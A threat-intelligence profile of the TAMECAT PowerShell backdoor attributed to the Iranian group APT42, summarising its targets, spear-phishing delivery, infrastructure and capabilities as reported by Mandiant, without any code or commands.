Tamecat | |
Type of Malware | Backdoor |
Country of Origin | Iran |
Date of initial activity | March 2024 |
Targeted Countries | Regions of interest to Iran |
Associated Groups | APT42 |
Motivation | Cybercriminals may use TAMECAT to access files, directories, applications, and more. With this access, threat actors can extract a wide range of sensitive information, including personal data, financial records, login credentials, and other valuable data. Additionally, threat actors may use TAMECAT to inject additional malware into the compromised systems. |
Attack Vectors | Malicious links from typo-squatted domains that are masquerading as news articles likely sent via spear phishing, redirecting the user to fake Google login pages. |
Tools | ExpressVPN nodes, Cloudflare-hosted domains, and ephemeral VPS servers |
Targeted System | Windows |
Overview
In March 2024, Mandiant identified a sample of TAMECAT, a PowerShell toehold capable of executing arbitrary PowerShell or C# content. TAMECAT is delivered by malicious macro documents, communicates with its command-and-control (C2) node via HTTP, and expects data from the C2 to be Base64 encoded. Mandiant previously observed TAMECAT being used in a large-scale APT42 spear-phishing campaign targeting individuals or entities employed by or affiliated with NGOs, governments, or intergovernmental organizations worldwide.Targets
Credentials of journalists, researchers, and geopolitical entities in regions of interest to Iran. Individuals or entities employed by or affiliated with NGOs, government, or intergovernmental organizations around the world